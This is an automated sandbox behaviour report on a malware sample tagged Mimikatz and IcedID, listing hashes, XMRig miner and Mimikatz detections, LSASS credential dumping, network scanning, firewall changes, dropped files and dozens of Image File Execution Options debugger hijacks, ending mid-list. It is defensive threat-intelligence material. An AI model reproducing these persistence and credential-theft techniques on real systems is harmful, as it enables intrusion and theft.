Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 05:06
Behavioral task
behavioral1
Sample
2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe
-
Size
14.2MB
-
MD5
7f1ca571158747d3ee4cd1227849d36d
-
SHA1
064dc85b913fa400e7a2145f17547f2a104dfd35
-
SHA256
d7d54c42d1fb9c1956fc8e65302482a361a8dca153073d021541dc7e60c7ec08
-
SHA512
a7b6cd4bb6d097e949ad9ae83a72aefcef47936faabd768c11507787a6c781e521523fa0866dcc9e9e390ce47264654ae826b8208f0c4a2e15584c66e397075e
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4768 created 2136 4768 zghnuwi.exe 38 -
Xmrig family
-
Contacts a large (29384) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4028-179-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-183-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-200-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-217-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-223-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-235-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-248-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-256-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-267-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-377-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-378-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig behavioral2/memory/4028-381-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3204-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3204-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x0008000000023cad-6.dat mimikatz behavioral2/memory/5108-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/4284-138-0x00007FF75C740000-0x00007FF75C82E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts zghnuwi.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts zghnuwi.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3448 netsh.exe 2652 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 5108 zghnuwi.exe 4768 zghnuwi.exe 2236 wpcap.exe 1132 igadlieeu.exe 4284 vfshost.exe 4360 eqelmsiua.exe 4584 xohudmc.exe 4248 rwdxsq.exe 4028 indtey.exe 1376 eqelmsiua.exe 4948 eqelmsiua.exe 3192 eqelmsiua.exe 4864 eqelmsiua.exe 440 eqelmsiua.exe 4208 eqelmsiua.exe 3408 eqelmsiua.exe 4308 eqelmsiua.exe 2388 zghnuwi.exe 4884 eqelmsiua.exe 3108 eqelmsiua.exe 4368 eqelmsiua.exe 3344 eqelmsiua.exe 3960 eqelmsiua.exe 1644 eqelmsiua.exe 4928 eqelmsiua.exe 1616 eqelmsiua.exe 3680 hqnaebagm.exe 3264 zghnuwi.exe -
Loads dropped DLL 12 IoCs
pid Process 2236 wpcap.exe 2236 wpcap.exe 2236 wpcap.exe 2236 wpcap.exe 2236 wpcap.exe 2236 wpcap.exe 2236 wpcap.exe 2236 wpcap.exe 2236 wpcap.exe 1132 igadlieeu.exe 1132 igadlieeu.exe 1132 igadlieeu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 ifconfig.me 67 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF zghnuwi.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache zghnuwi.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zghnuwi.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft zghnuwi.exe File created C:\Windows\SysWOW64\rwdxsq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\rwdxsq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF zghnuwi.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe -
resource yara_rule behavioral2/files/0x0007000000023cfd-135.dat upx behavioral2/memory/4284-136-0x00007FF75C740000-0x00007FF75C82E000-memory.dmp upx behavioral2/memory/4284-138-0x00007FF75C740000-0x00007FF75C82E000-memory.dmp upx behavioral2/memory/4360-142-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/files/0x0007000000023d08-141.dat upx behavioral2/memory/4360-155-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/files/0x0007000000023d05-164.dat upx behavioral2/memory/4028-165-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/1376-172-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4948-176-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4028-179-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/3192-181-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4028-183-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/4864-186-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/440-190-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4208-194-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/3408-198-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4028-200-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/4308-203-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4884-211-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/3108-215-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4028-217-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/4368-220-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4028-223-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/3344-225-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/3960-229-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/1644-232-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4928-234-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4028-235-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/1616-237-0x00007FF731840000-0x00007FF73189B000-memory.dmp upx behavioral2/memory/4028-248-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/4028-256-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/4028-267-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/4028-377-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/4028-378-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx behavioral2/memory/4028-381-0x00007FF769C90000-0x00007FF769DB0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\bliinatya\UnattendGC\specials\vimpcsvc.xml zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\scan.bat zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\svschost.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\spoolsrv.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\vimpcsvc.xml zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\Packet.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\libxml2.dll zghnuwi.exe File created C:\Windows\uqrutnuy\spoolsrv.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\exma-1.dll zghnuwi.exe File created C:\Windows\uqrutnuy\schoedcl.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\Shellcode.ini zghnuwi.exe File created C:\Windows\uqrutnuy\vimpcsvc.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\svschost.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\tucl-1.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\docmicfg.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\spoolsrv.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\trfo-2.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\svschost.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\docmicfg.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\libeay32.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\posh-0.dll zghnuwi.exe File created C:\Windows\uqrutnuy\svschost.xml zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\igadlieeu.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\cnli-1.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\crli-0.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\AppCapture32.dll zghnuwi.exe File created C:\Windows\ime\zghnuwi.exe zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\zghnuwi.exe 2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe File created C:\Windows\bliinatya\UnattendGC\schoedcl.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\docmicfg.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\tibe-2.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\xdvl-0.dll zghnuwi.exe File created C:\Windows\bliinatya\Corporate\mimilib.dll zghnuwi.exe File created C:\Windows\bliinatya\upbdrjv\swrpwe.exe zghnuwi.exe File opened for modification C:\Windows\bliinatya\rtbnheisb\Result.txt hqnaebagm.exe File opened for modification C:\Windows\bliinatya\rtbnheisb\Packet.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\ssleay32.dll zghnuwi.exe File created C:\Windows\bliinatya\Corporate\mimidrv.sys zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\ucl.dll zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\vimpcsvc.xml zghnuwi.exe File created C:\Windows\bliinatya\Corporate\vfshost.exe zghnuwi.exe File opened for modification C:\Windows\bliinatya\Corporate\log.txt cmd.exe File created C:\Windows\bliinatya\rtbnheisb\ip.txt zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\vimpcsvc.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\spoolsrv.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\spoolsrv.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\docmicfg.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\schoedcl.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\coli-0.dll zghnuwi.exe File created C:\Windows\uqrutnuy\docmicfg.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\AppCapture64.dll zghnuwi.exe File created C:\Windows\uqrutnuy\zghnuwi.exe 2024-11-13_7f1ca571158747d3ee4cd1227849d36d_hacktools_icedid_mimikatz.exe File created C:\Windows\bliinatya\UnattendGC\specials\schoedcl.exe zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\schoedcl.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\svschost.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\trch-1.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\zlib1.dll zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\wpcap.exe zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\wpcap.dll zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\hqnaebagm.exe zghnuwi.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1692 sc.exe 3172 sc.exe 1032 sc.exe 2956 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language igadlieeu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 